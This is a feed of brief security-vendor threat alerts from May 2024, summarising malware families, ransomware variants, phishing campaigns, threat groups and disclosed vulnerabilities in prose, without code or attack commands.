AllaSenha - new AllaKore malware variantALERTSVIRUSAllaSenha is a new banking malware variant from the AllaKore RAT family that has recently been used in distribution campaigns targeted at banking users in Brazil. The multi-staged infection chain leverages malicious .lnk files possibly delivered through phishing, BPyCode launcher binaries and a DLL loader dubbed ExecutorLoader that leads to the final AllaSenha payload. The malware functionality focuses on theft of user credentials associated with Brazil’s most popular banks. The targeted data includes passwords, QR codes and 2FA tokens. The malware abuses Azure Cloud infrastructure for the purpose of C2 communication and data exfiltration.

30.5.24

Zonix RansomwareALERTSRANSOMZonix is a recently discovered ransomware variant from the Xorist malware family. The malware encrypts user files and appends the ".ZoN" extensions to them. Zonix drops a ransom note as a text file called "HOW TO DECRYPT FILES.txt" and also displays a pop-up window on the desktop demanding 1500 USD in bitcoin for the decryption of the locked files.

30.5.24

CVE-2024-32640 - SQL Injection vulnerability in Mura/Masa CMSALERTSVULNEREBILITYCVE-2024-32640 is a recently disclosed SQL injection vulnerability affecting Mura/Masa CMS, which is an open source enterprise content management system. If successfully exploited the vulnerability might allow unauthorized attackers to access sensitive data. The product vendor has already released a patch to remediate this vulnerability in software versions 7.4.6, 7.3.13 and 7.2.8.

30.5.24

Emergence of a new North Korean threat actor dubbed Moonstone SleetALERTSAPTA recent emergence in the threat landscape involves a new North Korean actor dubbed Moonstone Sleet. This actor has been detected engaging in various deceptive tactics, including the establishment of fake companies and job listings to lure potential targets. Additionally, they have been distributing trojanized versions of legitimate software tools, developing malicious games, and introducing a novel custom ransomware named FakePenny, comprising a loader and an encrypter. Their targets span individuals and organizations across sectors such as software and information technology, education, and defense industrial base.

30.5.24

Fraudulent PDF Viewer Login Pages Phishing for User CredentialsALERTSPHISHINGA phishing campaign was recently observed where a malicious HTML attachment masquerading as a PDF Viewer login page prompts users to verify their password to access a document. Meanwhile, hidden in the background, a malicious JavaScript will attempt to steal the victim's credentials.

30.5.24

Agent Tesla: The Uninvited Guest at Indonesia's GEMASTIK 2024 EventALERTSVIRUSSymantec has recently observed a peculiar malspam campaign in Indonesia where the actor is running a sophisticated email scheme impersonating the School of Electrical Engineering and Informatics (STEI) at the Institut Teknologi Bandung (ITB) in Indonesia.

30.5.24

Red Akodon threat group recent activitiesALERTSVIRUSAccording to recent report published by SCITUM, Red Akodon is a new threat group conducting its malicious activities prevalently in Colombia since at least April 2024. The threat actors have been observed to target various public organizations and other businesses with a variety of commodity malware variants such as Remcos, QuasarRAT, Neshta, XWorm or AsyncRAT. The attack chain often relies on phishing emails coming from compromised accounts. The attackers have been leveraging malicious .svg files either directly attached in malspam or hosted on public file hosting repositories. The attacks conducted by this threat group aim at information exfiltration and gaining control over the compromised endpoints.

30.5.24

TXZ file extension: Evolution of malware distribution in email campaignsALERTSVIRUSThreat actors usually send malicious emails with attachments carrying a malicious payload, or they send out containers which include files like archives. In a recent campaign, multiple emails carrying files with the TXZ extension as attachments were observed. Late last year, Microsoft added native support to Windows 11 for the TXZ filetype. This means recipients of the malicious messages would have been able to open the TXZ attachment using Windows File Explorer if they are using the Windows 11 operating system. This shows that TXZ campaigns are actively used in some regionally targeted campaigns and can grow in the future with the adoption of Windows 11 or higher.

30.5.24

Gipy malware distributed under the disguise of AI voice generator toolsALERTSVIRUSA new malicious campaign spreading infostealing malware dubbed Gipy has been observed in the wild. The malware binaries are masqueraded as an AI voice generator tool and distributed via phishing websites. Some examples of the package names observed for this malware are as follows: VoiceAIbeta-x64.exe, VoiceAIAdvancedPro.exe, VoiceAiPro-x64.exe, VoiceAIChanger.exe, etc. Next to typical infostealing features, the malware has capabilities to download and execute additional arbitrary payloads. Various malware families have been observed among the malware payloads downloaded by Gipy, including: Lumma Stealer, Redline Stealer, DCRat, RadxRAT, RisePro, TrueClient and more.

28.5.24

Embargo RansomwareALERTSRANSOMEmbargo is a new Rust-based ransomware variant identified in the wild. The malware encrypts user files and appends “.564ba1” extension to them. Ransom note is dropped in form of a text file called “HOW_TO_RECOVER_FILES.txt” advising the victims to register on the attackers portal via the provided onion site link. The threat actors behind this malware have been reported to be employing the double extortion technique by not only encrypting confidential data but also by exfiltrating it and threatening the victims with public release.

28.5.24

Rising popularity of Arc browser overshadowed by malvertising campaignALERTSCAMPAIGNThe Arc browser, developed by The Browser Company, has been gaining a lot of popularity in the market, promising to personalize the way users browse the internet. With its innovative user interface design that sets it apart from traditional browsers, it started receiving even more attention after becoming available for Windows, whereas previously it was only intended for macOS systems.

28.5.24

Phishing campaign targeting financial institutions impersonates medical centerALERTSPHISHINGA phishing campaign targeting European and US financial institutions has been reported. The attacks involve sending emails impersonating a medical center, with SCR files disguised as financial documents to trick victims into downloading and executing them. These files contain code from a Python clone of the Minesweeper game, along with malicious Python code that downloads additional scripts from a remote source. The scripts are then used to extract and run a legitimate remote computer management program called SuperOps RMM which provides unauthorized remote access to victims' computers.

28.5.24

Iluria StealerALERTSVIRUSThere have been reports of in-the-wild activity for a run-of-the-mill stealer known as Iluria. Like many other forks and variants of Discord Stealers, it is capable of stealing tokens, browser credentials, and payment information. The malware is currently being advertised, and for now, consumers appear to be the focus via drive-by-download attacks. In addition, multiple tests are also being observed.

28.5.24

Rise of Fake AV websites hosting advanced malwareALERTSVIRUSRecently, there has been an increase in the number of fake antivirus (AV) websites pretending to be legitimate solutions. These deceptive sites have been found hosting advanced malicious files, such as APKs, EXEs, and Inno Setup installers, which can deliver spyware like the Spynote Trojan and data-stealing malwares such as Lummna and StealC. These malicious programs are adept at harvesting victim information, including browser data, and sending it to remote servers under the control of attackers.

28.5.24

CVE-2024-30268: XSS Vulnerability in CactiALERTSVULNEREBILITYCVE-2024-30268 is a reflected cross-site scripting vulnerability in Cacti, a network monitoring and fault management framework. If successfully exploited, this vulnerability allows attackers to obtain the cookies of the administrator and fake their login using the cookies. The vulnerability has been fixed in versions 1.3.x DEV. Symantec's network protection technology, Intrusion Prevention System (IPS), blocks these vulnerability exploitation attempts to prevent further infection/damage to the system.

28.5.24

CVE-2024-21793 and CVE-2024-26026 - two recent vulnerabilities affecting F5 BIG-IP Next Central Manager ALERTSVULNEREBILITYCVE-2024-21793 and CVE-2024-26026 are two recently identified high severity vulnerabilities affecting the F5 BIG-IP Next Central Manager. Both flaws are code injection vulnerabilities and have been given the CVSS score of 7.5. If successfully exploited they might allow unauthenticated attackers to run malicious SQL statements through the BIG-IP Central Manager API.

28.5.24

CVE-2020-17519: Directory Traversal Vulnerability in Apache FlinkALERTSVULNEREBILITYThe U.S. Cybersecurity and Infrastructure Security Agency (CISA) recently added a three-year-old directory traversal vulnerability (CVE-2020-17519) in Apache Flink to the Known Exploited Vulnerabilities Catalog. Apache Flink is an open-source batch-processing framework used for distributed processing of streaming data and is widely used in the field of big data. If successfully exploited, this vulnerability allows unauthenticated attackers to read any file on the local filesystem of the JobManager through the REST interface of the JobManager process.

28.5.24

Android Bankbot impersonates Uzbekistan banksALERTSVIRUSIn recent days, mobile users in Uzbekistan have been targeted by an Android BankBot campaign where actors are disguising their malware as fictitious banking apps (Xalq Banki Credit.apk & Bank Ipak.apk), impersonating two Uzbekistan banks: Xalq Banki and Ipak Yuli. If a user is successfully lured into installing these on their mobile phone, BankBot will monitor for when the user launches any banking apps it is coded to target. It will then leverage the classic overlay technique, overlaying a fake page on top of the legitimate one in order to steal the user's inputs, such as credentials. At this time, the vector of infection remains unknown but it's very likely that these are being spread via malicious SMS messages or redirections. 

25.5.24

Path Traversal Vulnerability in Nexus Repository CVE-2024-4956ALERTSVULNEREBILITYCVE-2024-4956 is a path traversal vulnerability in Sonatype Nexus Repository 3. Nexus Repository is a widely used artifact repository manager. If successfully exploited, this vulnerability will allows unauthenticated remote attackers to access and download sensitive system files, application source code and configurations. The CVSS score of this vulnerability was 7.5. Symantec's network protection technology, Intrusion Prevention System (IPS) blocks these vulnerability exploitation attempts to prevent further infection/damage to the system.

25.5.24

Operation Diplomatic Specter: A Chinese APT campaign targeting political entities in multiple regionsALERTSAPTAn ongoing campaign dubbed Operation Diplomatic Specter, targeting political entities in the Middle East, Africa, and Asia, has been reported. A Chinese APT group behind the campaign has been leveraging rare email exfiltration techniques against compromised servers.

25.5.24

RustDoor malware exploits JAVS Viewer vulnerability in courtroom softwareALERTSVIRUSA Windows-based malware named RustDoor has been observed being distributed via a compromised audio-visual recording software package used in courtroom environments. This backdoor enables attackers to gain full control of affected systems and transmit data about the host system to a command-and-control (C2) server. The malware exploits a deserialization vulnerability in JAVS Viewer software, tracked as CVE-2024-4978. JAVS technologies are utilized in courtrooms, jails, prisons, councils, hearings, and lecture halls nationwide, with more than 10,000 installations worldwide.

23.5.24

Expanded operations of the Sharp Dragon APTALERTSAPTAs reported by Checkpoint, Sharp Dragon APT group (also formerly known as Sharp Panda) has been expanding its operations towards targets in Africa and in the Caribbean. Sharp Dragon is known to use large-scale phishing attacks, malicious RTF files, DLL-loaders but most recently also executable loaders disguises as documents. The threat group has also been reported to leverage CVE-2023-0669 RCE vulnerability affecting Fortra GoAnywhere in their attacks.

23.5.24

CVE-2024-29895 - Command Injection Vulnerability in CactiALERTSVULNEREBILITYCVE-2024-29895 is a critical (CVSS score 10) command injection vulnerability affecting Cacti, which is a network monitoring and fault management framework. If successfully exploited the vulnerability may allow unauthenticated remote attackers to execute arbitrary commands on the affected servers through URL manipulation. While the vulnerability has not yet been reported as being exploited in the wild, a Proof of Concept for it is publicly available. The product vendor has already released a patch to remediate this vulnerability.

23.5.24

Waltuhium GrabberALERTSHACKINGWaltuhium is an open-source infostealer that has been observed being shared in dark web forums. It is claimed to have features such as keylogging, screenshot capturing, WiFi stealing, Discord injection, password stealing, credit card stealing, cryptocurrency and wallet stealing, as well as tokens from Discord and browsers, and session stealing. Additionally, it has anti-VM and anti-debug functionality. The stolen data is zipped and posted to a defined Discord webhook server.

23.5.24

GuLoader Impersonates an Italian Seafood DistributorALERTSVIRUSGuLoader, an advanced downloader, is showing no signs of stopping, and its prevalence continues to increase with more and more campaigns observed around the world. One campaign was recently identified where actors are posing as a known Italian company that specializes in the wholesale and retail distribution of seafood, sourcing and importing its products from various countries. 

23.5.24

CLOUD#REVERSER campaign leverages cloud storage for malware deliveryALERTSCAMPAIGNA new campaign dubbed CLOUD#REVERSER has been reported to abuse various cloud storage repositories such as Dropbox or Google Drive for malware delivery and C&C purposes. The attackers leverage phishing emails with malicious attachments in the initial attack stages and several VBScript and PowerShell-based payload executions in later stages. The dropped malware has the functionality to exfiltrate user data, execute arbitrary commands and scripts received from the attackers as well as download additional binaries and execute them on the infected endpoints.

23.5.24

Acrid infostealer leverages “Heaven’s Gate” techniqueALERTSVIRUSAcrid is a recently identified C++-based infostealing malware. In its functionality, it is very similar to other infostealer variants present currently in the threat landscape. Its main functionality relies on collecting various user data from the compromised endpoints and exfiltration to the C&C servers controlled by the attackers. Acrid focuses on the theft of data such as browser cookies, passwords stored in browsers, banking information, cryptocurrency wallets, and credentials stored in various applications. Acrid has been reported to leverage a "Heaven’s Gate" technique that effectively enables 64-bit code to be executed within a 32-bit process, potentially allowing the malware to evade security controls monitoring only 32-bit processes.

23.5.24

CVE-2023-43208 - NextGen Healthcare Mirth Connect RCE vulnerability exploited in the wildALERTSVULNEREBILITYCVE-2023-43208 is a Remote Code Execution (RCE) vulnerability disclosed in October last year. The vulnerability affects NextGen Healthcare Mirth Connect prior to version 4.4.1, which is an open-source data integration suite used by healthcare companies. If exploited the vulnerability may allow unauthenticated remote attackers to execute code on affected systems, leading to the compromise of critical healthcare data. The vulnerability has been reported as being exploited in the wild and has been added to the "Known Exploited Vulnerabilities Catalog" (KEV) by CISA. 

23.5.24

GhostEngine malware terminates EDR agents and deploys coin minerALERTSVIRUSA multimodule malware dubbed GhostEngine has been observed in the wild. This malware leverages vulnerable drivers to terminate and delete known Endpoint Detection and Response (EDR) agents that would likely interfere with the deployed coin miner.

22.5.24

Smishing: Fake IRS Scare Tactic to Snatch Cryptowallets' 12-Word Recovery Phrases ALERTSPHISHINGSymantec has recently observed a malicious SMS campaign in the US targeting mobile users' cryptowallet 12-word recovery phrases. The actors are impersonating the IRS and using a scare tactic related to cryptocurrency holdings declaration. 

22.5.24

XWorm v5.6 malwareALERTSVIRUSA new v5.6 variant of the XWorm malware has been observed in the wild. The malware is distributed under the disguise of various applications, games or adult content, with the binaries spread through either online sharing repositories or via torrent downloads. XWorm has miscellaneous capabilities including keylogging, data theft, download of additional arbitrary payloads, RAT functionalities and others.

22.5.24

Malware campaign uses LNK files and MSBuild to likely deliver TinyTurla backdoorALERTSVIRUSA malware campaign utilizing malicious LNK files has been observed. The threat actors behind the campaign are using human rights seminar invitations and public advisories to lure users. Once lured, MSBuild is used to execute and deliver a fileless final payload. This payload is believed to be the TinyTurla backdoor, based on its first-stage backdoor functionalities and utilization of a specific C2 infrastructure.

22.5.24

Keyplug backdoor distributed against organizations in ItalyALERTSVIRUSA new campaign attributed to the Grayfly threat group (aka APT41) has been distributing the Keyplug modular malware to various organizations in Italy. As reported by Yoroi, this C++based malware comes in variants supporting both Windows and Linux platforms. Keyplug has the capabilities to initiate the C2 communication with attacker servers either via abuse of CloudFlare's CDN (Content Delivery Network) and via the WSS protocol.

21.5.24

Deuterbear RAT targets Asia-Pacific in advanced cyber espionage campaignALERTSVIRUSA cyber espionage campaign has been reported targeting the Asia-Pacific region, involving the deployment of a remote access trojan (RAT) called Deuterbear. The RAT exhibits advanced capabilities, such as anti-analysis techniques, avoiding handshakes during RAT operation, anti-memory scanning, and using HTTPS for command-and-control (C&C) communication. The Deuterbear infection chain involves two stages: the first stage functions as a plugin downloader, while the second stage acts as a backdoor, harvesting sensitive information from the compromised host.

21.5.24

SamsStealer malwareALERTSVIRUSReports have emerged of a new infostealer, dubbed SamsStealer, circulating in the threat landscape. This malware covertly infiltrates victims' systems, exfiltrating various forms of personal data, including login credentials, cryptocurrency wallets, session data, and browsing history. The stolen data is transmitted to file-sharing services and messaging platforms like Telegram, which are used as command-and-control (C2) servers by the attackers.

21.5.24

Bank Mellat Users in Various Countries Targeted by FakeBank CampaignALERTSCAMPAIGNSymantec has observed an Android FakeBank campaign targeting mobile users of a private Iranian bank known as Mellat, by posing as a fictitious banking app (Mellat.apk). Bank Mellat, also known as "Bank of the Nation", has a number of offices and branches both domestically within Iran and internationally. 

21.5.24

Vultur Malware Poses as Antivirus ALERTSVIRUSRecently, a Vultur campaign has been observed in which the actor is disguising it as a known antivirus mobile application (<company name>_Security.apk). This Android banking malware leverages the overlay technique, displaying fake overlay windows in the hope of tricking users into entering their banking credentials. It targets hundreds of banks and cryptocurrency exchange platforms.

21.5.24

HiJackLoader gets new modules to lay lowALERTSVIRUSHijackLoader is a multi-stage loader that has recently seen some updates. The first stage allows the loader decrypt and decompress additional modules and execute a second stage while the second stage process lives in memory to read an embedded or remotely hosted image in order to fully initiate the second stage and load additional modules. Some of the newly discovered modules, like User Account Control bypass, are design to allow for additional persistence in the target environment.

21.5.24

Antidot mobile malwareALERTSVIRUSAntidot is a recently discovered banking trojan for Android. The malware is distributed under the disguise of a Google Play update app. Functionality-wise Antidot is capable of keylogging, overlay attacks, SMS exfiltration, screen captures, credentials theft, device control and execution of commands received from the attackers. Malware has the capability to establish http connections or WebSocket communication to the C2 servers.

21.5.24

Chaos Ransomware Lures Gamers with Fake Free Discord NitroALERTSRANSOMAs the Chaos Ransomware builder is widely available to the public, instances are observed on a daily basis around the world with both consumers and enterprises being targeted. Recently, one actor has been luring consumers, more specifically gamers, with a Chaos Ransomware disguised as a fake free Discord Nitro. Within the ransom note, the actor is hoping to extort compromised users of 0.003 BTC, which is the equivalent of 195 USD at the time of writing.

21.5.24

Synapse RansomwareALERTSRANSOMSynapse is a ransomware written in C that can encrypt local files, files on removable drives, and files stored on network shares, with the capability of propagating to other systems on a network. Encrypted files will have the extension .Synapse added to them. Additionally, a ransom note named [random_string].README.txt is dropped. The ransomware has the capability to collect system information and encryption statistics, and exfiltrate the data to its remote C2 server. Victims are provided with a URL (hosted on the Tor network) as a means of contact.

21.5.24

Storm-1811 threat actor conducts Vishing attack via Quick Assist toolALERTSGROUPThreat actor Storm-1811 has been reported carrying out a vishing (voice phishing) attack using the client management tool Quick Assist. Quick Assist is an application that enables a user to share their system with another person over a remote connection to resolve issues. Once the user grants full control, the threat actor executes scripts that lead to the download of batch files with the aim of deploying Black Basta ransomware as the final payload throughout the network.

21.5.24

Springtail threat group uses new Linux backdoor in attacksALERTSAPTIn a newly released report, Symantec’s Threat Hunter Team sheds light on a recently discovered Linux backdoor developed by the North-Korean Springtail espionage group (aka Kimsuky). This group is linked to malware used in a recent campaign against organizations in South Korea. The campaign leveraged Trojanized software installation packages to deliver the backdoor.

16.5.24

New malware CuttlefishALERTSVIRUSA new malware dubbed Cuttlefish was reported to infect small office/home office and enterprise grade routers with the intent to monitor passing data traffic and discreetly exfiltrating only authentication related information such as usernames, passwords, and tokens etc. It also has the capability of introducing more payloads.

16.5.24

Remcos RAT expands functionality with PrivateLoader module ALERTSVIRUSRemcos RAT, a remote access Trojan, enables unauthorized remote control and surveillance of compromised systems. Recently, Remcos RAT was observed leveraging a PrivateLoader module to augment its functionality and persistence on the victim's machine. By employing VB scripts,registry modification, and establishing services to restart the malware at varying intervals, this malware can thoroughly infiltrate a system, evade detection, and report statistics to its C2 server.

16.5.24

Malicious Minecraft mod harvests data from Windows systemALERTSVIRUSMany gamers prefer to enhance their gaming experience with custom mods, such as those offering the Windows Borderless feature. This feature enables multitasking and seamless switching between applications, facilitating tasks like game recording.

16.5.24

Atomic Stealer (AMOS) among the malware variants spread in the GitCaught operationALERTSVIRUSA recent malicious campaign dubbed GitCaught has been reported to spread multiple infostealing payloads targeted at various platforms including macOS. The distributed malware variants include Atomic Stealer (AMOS), Vidar Stealer, Lumma and Octo banking trojan. The attackers have been leveraging fake profiles and repositories hosted on Github that offer software binaries masqueraded as various popular applications. Threat actors behind this campaign have also been utilizing web-based infrastructure including Filezilla FTP servers for malware delivery.

16.5.24

PureCrypter malware used in Mallox ransomware distribution campaignALERTSVIRUSPureCrypter loader has been used in a recent malicious campaign leading up to the delivery of Mallox ransomware payloads. The attackers have been reported to employ brute-force attacks against vulnerable or otherwise mis-configured MS-SQL servers in the initial attacks stages. PureCrypter is a piece of Malware-as-a-Service (MaaS) offering and potentially leveraged by various affiliates. The delivered payloads might also exfiltrate the user data before encryption, as the Mallox ransomware operators have been known to employ double extortion techniques in the past attacks.

16.5.24

Malicious Word Document Dropping DanaBot Malware ALERTSVIRUSA recent Danabot malspam campaign was observed being delivered via a Word document containing a malicious external link which if clicked will launch a series of events where additional executable files will get downloaded including a command prompt, and a PowerShell. This process eventually leads to the dropping of payloads such as iu4t4.exe (Danabot) and rundll32.exe, which are responsible for collecting sensitive user and system information.

15.5.24

Phorpiex botnet distributes LockBit Black Ransomware via email campaignALERTSBOTNETA high-volume email campaign facilitated by the Phorpiex botnet, delivering LockBit Black ransomware, has been reported. Phorpiex functions as a Malware-as-a-Service platform and has amassed a significant customer base among threat actors over more than a decade of operation. Since 2018, Phorpiex has been involved in activities such as data exfiltration and ransomware distribution. Despite attempts to disrupt its operations over the years, the botnet continues to persist.

15.5.24

Dracula (Samurai) StealerALERTSVIRUSDracula (also known as Samurai Stealer) is an infostealing malware variant attributed to the threat group known as the Amnesia Team (aka Cerberus). This threat actor is known for using various other infostealer variants including Aurora, Lumma, Redline and Rhadamanthys, among others. Dracula Stealer is leveraged by the attackers to exfiltrate a wide range of confidential information from victim machines including credentials, banking information and others. 

15.5.24

WaveStealer: New malware distributed on messaging platformsALERTSVIRUSWaveStealer, a newly emerged sophisticated malware tool, is being distributed on platforms like Telegram and Discord for purchase at a low cost. This malware is disguised as video game installers and designed to extract various types of sensitive data from compromised systems. It targets web browsers, cryptocurrency wallets, credit card numbers, as well as data associated with messaging platforms like Telegram and Discord. Additionally, WaveStealer has the capability to capture screenshots, enhancing its data exfiltration capabilities.

15.5.24

FIN7 malware campaign exploiting Google AdsALERTSVIRUSA malware campaign exploiting Google Ads, attributed to the threat actor FIN7, has been reported in the wild. The attackers utilized deceptive websites masquerading as well-known brands like AnyDesk, WinSCP, BlackRock, Asana, Concur, and Google Meet. Visitors to these sites, often directed through sponsored Google Ads, encountered fake pop-ups urging them to download what seemed to be a browser extension. However, the downloaded payload was actually an MSIX file, a packaging format for Windows apps, which delivered NetSupport RAT and DiceLoader for subsequent stages in the infection chain.

15.5.24

Beast Ransomware and Vidar Infostealer delivered via disguised documentsALERTSRANSOMDocuments like copyright violation warnings and resumes were leveraged in a recent campaign to deliver ransomware and infostealer. Initial infection initiates from a phishing email with an external malicious link that if clicked will download a compressed file. Upon decompression, two executable files will be dropped and these are identified as Beast Ransomware and Vidar Infostealer.

15.5.24

GCash Users Targeted in Latest Smishing ScamALERTSSPAMMobile wallets have transformed the financial landscape by providing convenience and accessibility, but they also present lucrative targets for cybercriminals as Symantec continues to observe a flurry of smishing around the world. 

15.5.24

Trinity RansomwareALERTSRANSOMAccording to a recent research published by Cyble, Trinity is a newly identified ransomware variant believed to be an updated version of the “2023Lock” ransomware. The malware encrypts user files and appends “.trinitylock” extension to them. Trinity ransomware has also been reported to share some code base with yet another ransomware variant known as Venus. The threat actors behind Trinity are employing the double extortion techniques by also exfiltrating confidential files and threatening to publicly release them. 

15.5.24

Malspam campaign delivers ASyncRAT by way of multiple scriptsALERTSVIRUSIn a recently observed campaign, multiple scripts were used to deliver the ASyncRAT payload. Initiated by an HTML email attachment, victims would be compromised by various non-PE files to deliver and establish persistence of ASyncRAT. The attack downloads a Windows Script File (WSF) that in turn launches a VBS file that's responsible for further execution. Latter parts of the attack are carried out by JS, PowerShell, and batch script components.

15.5.24

Black Basta ransomware attacks target the healthcare sectorALERTSRANSOMSymantec Security Response is aware of the recent joint alert from CISA, the FBI, Department of Health and Human Services (HHS), and Multi-State Information Sharing and Analysis Center (MS-ISAC) regarding a number of targeted activities observed for the Black Basta ransomware. This malware variant is known since at least 2022 and has been leveraged in a number of campaigns targeted at critical infrastructure including the Healthcare and Public Health (HPH) sector. Black Basta is ransomware-as-a-service (RaaS) variant mostly distributed via phishing or exploitation of disclosed vulnerabilities. The attackers behind this malware often employ the double extortion model by not only encrypting user files but also by exfiltrating them and threatening with public release of the stolen data.

15.5.24

A Mining Trojan called Hidden ShovelALERTSVIRUSResearchers uncovered a new mining trojan dubbed "Hidden Shovel", discovered through network security monitoring. This Trojan was initially spotted back in November 2023 and has been undergoing multiple upgrades, currently at version 3.0. Hidden Shovel's key features are strong concealment, anti-analysis measures, DLL hijacking backdoor and shellcode injection capabilities. 

12.5.24

CVE-2024-24506 - LimeSurvey Community Edition XSS vulnerabilityALERTSVULNEREBILITYCVE-2024-24506 is a recently disclosed Cross Site Scripting (XSS) vulnerability affecting LimeSurvey Community Edition version 5.3.32. The bug is caused by improper validation of user-supplied input of the Administrator email address field. If successfully exploited, the vulnerability might allow the remote attackers to insert and execute arbitrary code via the Administrator email address parameter.

12.5.24

CVE-2024-1313 - BOLA vulnerability in GrafanaALERTSVULNEREBILITYCVE-2024-1313 is a recently disclosed Broken Object-Level Authorization (BOLA) vulnerability affecting Grafana, which is a open-source data visualization web application. Successfull exploitation of this vulnerability might potentially lead to unauthorized access and data leak from the vulnerable dashboards. The unprivileged attackers might be allowed to bypass authorization and also delete Grafana dashboard snapshots. Grafana vendor has already released a patch to address this vulnerability.

10.5.24

Exploitation of Ivanti Pulse Secure vulnerabilities for Mirai botnet deliveryALERTSExploit  In January of this year, Ivanti reported two vulnerabilities, CVE-2023-46805 (Authentication Bypass) & CVE-2024-21887 (Command Injection), affecting Ivanti Connect Secure and Ivanti Policy Secure Gateways.

10.5.24

Malware campaign targeting Windows and MS Office users via software cracksALERTSVIRUSA malware campaign distributing RATs and coinminers via cracks for popular software, specifically targeting users of Windows and MS Office software, has been observed. The malware, once installed, often registers commands in the task scheduler to maintain persistence, enabling continuous installation of new malware even after removal.

10.5.24

Coper Actors Abuse LiveChat CDN in Ongoing Fake Chrome TacticALERTSVIRUSSymantec continues to observe daily instances of Coper malware disguised as a fake Chrome Android application. This tactic is not new having been in use for some time now. The attack chain's initial step remains uncertain, but recently observed Coper samples have been hosted on a content delivery network (CDN) used by LiveChat, a customer service platform.

10.5.24

Malspam campaign: Password protected archive hosted on GitHub leads to AsyncRATALERTSCAMPAIGN
Over the past two weeks, Symantec has observed an actor leveraging a peculiar attack chain to distribute highly obfuscated payload onto compromised systems. The attacks start with malicious emails containing a malicious PDF, DOCX, or SVG file (REMITIRA A TRAVES DEL SERVICIO POSTAL AUTORIZADO.docx, Radicado juridico 23156484.svg, and 99-DEMANDA .docx).

10.5.24

Russian bulletproof hosting services exploited for malicious activities, SocGholish malware campaignsALERTSExploitThe use of Russian bulletproof hosting services for hosting malicious activities, including command-and-control (C2) servers and phishing pages distributing SocGholish malware, has been reported. Multiple malware campaigns in recent months have utilized the Matanbuchus loader, with their C2 infrastructure hosted on bulletproof hosting services like "Proton66 OOO".

10.5.24

Malicious Minecraft Mods: zEus stealer targets gamersALERTSVIRUSA malware campaign targeting Minecraft players has been reported, where custom packages promising to enhance the game's appearance are actually distributing the zEus stealer. This infostealer is designed to evade detection while stealing sensitive data and dropping additional payloads, typically in the form of a batch file, to establish communication with a command-and-control (C2) server for further instructions. This malware is capable of capturing screenshots and exfiltrating data to a webhook server controlled by the threat actor.
9.5.24Malicious Minecraft Mods: zEus stealer targets gamersALERTSVIRUSA malware campaign targeting Minecraft players has been reported, where custom packages promising to enhance the game's appearance are actually distributing the zEus stealer. This infostealer is designed to evade detection while stealing sensitive data and dropping additional payloads, typically in the form of a batch file, to establish communication with a command-and-control (C2) server for further instructions. This malware is capable of capturing screenshots and exfiltrating data to a webhook server controlled by the threat actor.
9.5.24Continuous Distribution of RokRAT MalwareALERTSVIRUSAPT37 (ScarCruft) continues to distribute RokRAT malware via LNK files particularly targeting South Korean users. The malware, disguised within a genuine document will execute PowerShell commands after activation. Subsequently, these commands will execute additional files, enabling attackers to gather user information and transmit that data back to their C2 servers.
9.5.24Gadfly buzzes inboxes with new phishing campaignALERTSCAMPAIGNSymantec has recently observed an uptick in phishing campaigns being delivered out of Gadfly (aka TA577). This campaign entices users to open the attached PDF, named with a Latin word, containing a link utilizing typo squatted subdomains for Microsoft login services, with the end goal being credential theft for later use.
9.5.24Hunt Ransomware - another Dharma/Crysis variantALERTSRANSOMHunt is another Dharma/Crysis ransomware variant discovered recently in the wild. The malware encrypts user files and appends .hunt extension to them alongside of a unique victim ID and the threat actor email address. The dropped ransom note in form of a text file asks the victims to contact the attackers via the provided email address for further instructions on how to restore the locked files.
9.5.24CVE-2024-27956 - WP-Automatic Plugin SQL Injection vulnerability exploited in the wildALERTSVULNEREBILITYCVE-2024-27956 is a recently disclosed critical (CVSS score 9.8) SQL injection (SQLi) vulnerability in WP-Automatic plugin prior to version 3.92.1. Successfully exploitation of this vulnerability might allow the attackers to run arbitrary SQL queries, create new admin accounts or upload malicious files onto the compromise servers. This vulnerability has been reported as being actively exploited in the wild.
9.5.24Shinra RansomwareALERTSRANSOMShinra, a recently discovered ransomware variant from the Proton malware family, encrypts files and appends the ".SHINRA3" extension while renaming file names to random strings. A ransom note is dropped as a text file called "#SHINRA-Recovery.txt" containing contact details, typically the attacker's email address. 
9.5.24CVE-2024-2389 - Command Injection vulnerability affecting Progress FlowmonALERTSVULNEREBILITYCVE-2024-2389, a recently disclosed critical vulnerability with a CVSS score of 10, affects Progress Flowmon, a widely used network performance monitoring tool. If successfully exploited, the bug allows unauthenticated attackers to access the Flowmon web interface via crafted API requests. This compromise can lead further to arbitrary code execution on vulnerable systems. The proof-of-concept for this vulnerability has been released publicly and the vendor has already issued a patched version of the application.
9.5.24Increase of Lockbit ransomware attacksALERTSRANSOMEarlier in February this year the Lockbit ransomware family was targeted in a coordinated disruption operation called "Operation Cronos" that saw multiple members of this ransomware gang arrested, assets taken and a decryption tool released publicly. Despite those efforts Lockbit still remains active in the threat landscape and we recently observed a spike in detections related to this ransomware variant. Symantec's Advanced Machine Learning technology played a crucial role in blocking this attack by detecting the malicious emails at the beginning of the attack chain.
7.5.24CVE-2024-4040 - CrushFTP vulnerability exploited in the wildALERTSVULNEREBILITYCVE-2024-1852 is a recently disclosed injection vulnerability affecting CrushFTP versions before 10.7.1 and 11.1.0. Successful exploitation of this vulnerability could allow unauthenticated remote attackers to perform VFS Sandbox escape, bypass authentication, gain administrative privileges and potentially execute arbitrary remote code on the vulnerable servers. The vulnerability has been reported as being exploited in the wild and the vendor has already released patched version of the application.
7.5.24Counterfeit Revenue Agency page distributing VBlogger malwareALERTSVIRUSA malware campaign involving a counterfeit Revenue Agency webpage hosted on an Italian domain has been reported. Upon accessing the site, users unwittingly download an archive containing a malware downloader, which in turn fetches the final payload via FTP to Altervista. The malware, dubbed "vblogger," is developed in VB6 and possesses keylogging and clipboard capture functionalities. The harvested information is stored in a text file and then sent to the command-and-control server (C2) on Altervista.
7.5.24Cuckoo: A new macOS malware targeting music ripping applicationsALERTSVIRUSA new macOS malware dubbed Cuckoo has been reported. This malware is distributed through websites that offer applications for ripping music from streaming services. Cuckoo boasts extensive functionality, including the collection of browser-stored information such as passwords, cookies, and other credentials. Additionally, it gathers system information and data related to installed cryptocurrency wallets and extensions.
7.5.24Android malware used in targeted attack against Indian defense forcesALERTSVIRUSA socially engineered delivery through WhatsApp was leveraged to reportedly target Indian defense forces with a new Android malware by presenting itself as a defense-related application. Upon successful delivery, the application would install itself under the guise of a Contacts application. Upon execution, the app would request permissions for SMS, Contacts, Storage, and Telephone and subsequently remove itself from view.

3.5.24

